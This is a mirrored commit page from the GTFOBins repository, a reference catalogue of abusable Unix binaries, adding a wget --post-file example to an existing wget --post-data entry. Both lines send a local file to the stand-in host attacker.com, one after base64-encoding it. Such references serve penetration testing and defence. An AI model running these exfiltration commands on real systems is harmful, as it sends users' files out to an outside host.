mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add wget --post-file
This commit is contained in:
parent
ad1f052edb
commit
1558400b06
@ -6,6 +6,9 @@ functions:
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
wget --post-file="/path/file_to_send" $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
|
Loading…
Reference in New Issue
Block a user